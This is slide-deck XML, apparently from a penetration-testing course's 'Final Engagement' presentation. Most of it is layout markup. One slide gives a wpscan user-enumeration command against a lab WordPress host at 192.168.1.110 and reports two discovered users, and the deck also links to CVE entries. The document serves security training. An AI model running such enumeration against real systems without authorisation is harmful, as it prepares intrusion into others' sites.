          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731329" y="13083880"/>
            <a:ext cx="22915500" cy="27300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="A9B7C0"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1684" name="Google Shape;1684;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85" name="Google Shape;1685;p12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6" name="Google Shape;1686;p126"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219475" y="10328151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1687" name="Google Shape;1687;p12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07</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1688" name="Google Shape;1688;p12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89" name="Google Shape;1689;p126"/>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90" name="Google Shape;1690;p12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1" name="Google Shape;1691;p126"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219175" y="11496427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1692" name="Google Shape;1692;p1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08</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1693" name="Google Shape;1693;p1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4" name="Google Shape;1694;p12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695" name="Google Shape;1695;p12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6" name="Google Shape;1696;p126"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219342" y="7991151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1697" name="Google Shape;1697;p12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05</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1698" name="Google Shape;1698;p12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99" name="Google Shape;1699;p12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00" name="Google Shape;1700;p12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01" name="Google Shape;1701;p126"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219042" y="9159427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1702" name="Google Shape;1702;p12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06</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1703" name="Google Shape;1703;p12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4" name="Google Shape;1704;p12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05" name="Google Shape;1705;p12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06" name="Google Shape;1706;p126"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219408" y="5694151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1707" name="Google Shape;1707;p12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03</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1708" name="Google Shape;1708;p12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09" name="Google Shape;1709;p126"/>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10" name="Google Shape;1710;p12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1" name="Google Shape;1711;p126"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219108" y="6862427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1712" name="Google Shape;1712;p1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04</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1713" name="Google Shape;1713;p1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4" name="Google Shape;1714;p126"/>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15" name="Google Shape;1715;p12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6" name="Google Shape;1716;p126"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219275" y="3357151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1717" name="Google Shape;1717;p12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01</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1718" name="Google Shape;1718;p12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9" name="Google Shape;1719;p126"/>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
        <p:nvSpPr>
          <p:cNvPr id="1720" name="Google Shape;1720;p12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1" name="Google Shape;1721;p126"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218975" y="4525427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1722" name="Google Shape;1722;p12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marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPts val="5300"/>
                <a:buFont typeface="Arial"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1723" name="Google Shape;1723;p12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4" name="Google Shape;1724;p126"/>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marR="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="37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700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="37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theme" Target="../theme/theme2.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50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout126.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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme3.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slideLayout" Target="../slideLayouts/slideLayout128.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout84.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout127.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1"/>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2" r:id="rId16"/>
    <p:sldLayoutId id="2147483723" r:id="rId17"/>
    <p:sldLayoutId id="2147483724" r:id="rId18"/>
    <p:sldLayoutId id="2147483725" r:id="rId19"/>
    <p:sldLayoutId id="2147483726"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08"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1309" name="Google Shape;1309;p29"/>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marL="0" marR="0" lvl="0"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3500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="35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hyperlink" Target="http://192.168.1.110/wordpres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mailto:Michael@192.168.1.110"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mailto:steven@192.168.1.11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comments" Target="../comments/comment2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.110/wordpres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7.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cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24692" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.110/wordpres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nvd.nist.gov/vuln/detail/CVE-2007-127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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2321" name="Google Shape;2321;p1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731377" y="5060867"/>
            <a:ext cx="22914900" cy="2112900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="9600"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Final Engagement</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6800"/>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2" name="Google Shape;2322;p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a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2323" name="Google Shape;2323;p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pic>
        <p:nvPicPr>
          <p:cNvPr id="2324" name="Google Shape;2324;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7890675" y="8104100"/>
            <a:ext cx="8220500" cy="4363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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2401" name="Google Shape;2401;p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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploitation 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Users Enumeration</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D5156"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="7200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2402" name="Google Shape;2402;p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t>10</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2403" name="Google Shape;2403;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703389" y="1859300"/>
            <a:ext cx="22942800" cy="113599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a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1892300" lvl="2" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wpscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://192.168.1.110/wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -e u  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AE02CA0-AD16-925C-430D-2E82A264285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="596817" y="4591408"/>
            <a:ext cx="17040356" cy="8627792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3242768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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2408" name="Google Shape;2408;p1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fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="16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600"/>
                <a:buFont typeface="Arial"/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>11</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2409" name="Google Shape;2409;p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
        <p:nvSpPr>
          <p:cNvPr id="2410" name="Google Shape;2410;p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dirty="0"/>
              <a:t>Exploitation 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Users Enumeration</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D5156"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2411" name="Google Shape;2411;p10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703389" y="1697375"/>
            <a:ext cx="22942800" cy="113599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000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve? </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1435100" lvl="1" indent="-571500">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Two users: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>michae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steven</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
